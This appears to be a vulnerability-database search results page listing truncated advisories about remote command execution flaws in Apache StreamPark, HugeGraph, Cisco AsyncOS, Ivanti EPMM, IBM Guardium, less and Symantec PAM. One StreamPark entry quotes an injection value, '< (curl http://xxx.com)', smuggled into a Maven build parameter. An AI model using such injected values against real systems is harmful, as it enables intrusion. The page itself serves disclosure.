19630 matches found
Apache Hugegraph 1.0.0 < 1.3.0 Remote Command Execution
Apache Hugegraph versions 1.0.0 prior to 1.3.0 is affected by a vulnerability allowing an unauthenticated attacker to execute remote commands via a specially forged request. No source data...
GHSA-5V69-92VW-FMJH Apache StreamPark: maven build params could trigger remote command execution
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
GHSA-7G94-HFQC-Q993 Apache StreamPark: Unchecked maven build params could trigger remote command execution
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
CVE-2024-29737
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
CVE-2024-29737
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
CVE-2023-52291
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
CVE-2024-29737
CVE-2024-29737 concerns a command-injection flaw in Apache StreamPark (Project module). The vulnerability arises from lax validation of build parameters in the Maven integration, allowing an authenticated user with system-level permissions to inject commands via the Build Argument (demonstrated b...
CVE-2024-29737 Apache StreamPark (incubating): maven build params could trigger remote command execution
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
CVE-2024-29737 Apache StreamPark (incubating): maven build params could trigger remote command execution
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
CVE-2023-52291
CVE-2023-52291 concerns Apache StreamPark. The vulnerability stems from lax validation of maven build parameters in the StreamPark project module, allowing command injection when the input parameter < is used (for example, < (curl http://xxx.com)). An attack requires the user to be logged i...
CVE-2023-52291 Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...
PT-2024-5447 · Cisco · Cisco Asyncos
Name of the Vulnerable Software and Affected Versions: Cisco AsyncOS for Secure Email Gateway affected versions not specified Description: A vulnerability in the web-based management interface of Cisco AsyncOS for Secure Email Gateway could allow an authenticated, remote attacker to execute...
PT-2024-5158 · Ivanti · Ivanti Endpoint Manager Mobile
Name of the Vulnerable Software and Affected Versions: Ivanti Endpoint Manager Mobile EPMM versions prior to 12.1.0.1 Description: The issue is related to an insufficient authorization vulnerability in the web component of EPMM. This vulnerability allows an unauthorized attacker within the networ...
The vulnerability of the IBM Security Guardium security tool arises from the failure to take measures to neutralize special elements used in the operating system’s command set. This allows attackers to execute arbitrary commands.
The vulnerability of the IBM Security Guardium information protection tool exists because measures to neutralize special elements used in the operating system have not been implemented. Exploiting this vulnerability allows a malicious actor to execute arbitrary commands remotely...
EulerOS 2.0 SP9 : less (EulerOS-SA-2024-1965)
According to the versions of the less package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : closealtfile in filename.c in less before 606 omits shellquote calls for LESSCLOSE.CVE-2022-48624 less through 653 allows OS command execution via a...
CVE-2024-38494
This vulnerability allows a high-privileged authenticated PAM user to achieve remote command execution on the affected PAM system by sending a specially crafted HTTP request...
CVE-2024-36455
An improper input validation allows an unauthenticated attacker to achieve remote command execution on the affected PAM system by sending a specially crafted HTTP request...
CVE-2024-36456
This vulnerability allows an unauthenticated attacker to achieve remote command execution on the affected PAM system by uploading a specially crafted PAM upgrade file...
CVE-2024-38494 Symantec Privileged Access Manager Remote Command Execution vulnerability
This vulnerability allows a high-privileged authenticated PAM user to achieve remote command execution on the affected PAM system by sending a specially crafted HTTP request...
CVE-2024-38494
Broadcom Symantec Privileged Access Management (PAM) contains a vulnerability that, when exploited by a high-privileged authenticated PAM user, enables remote command execution on the affected PAM system via a specially crafted HTTP request. Affected component appears to be the PAM software itsel...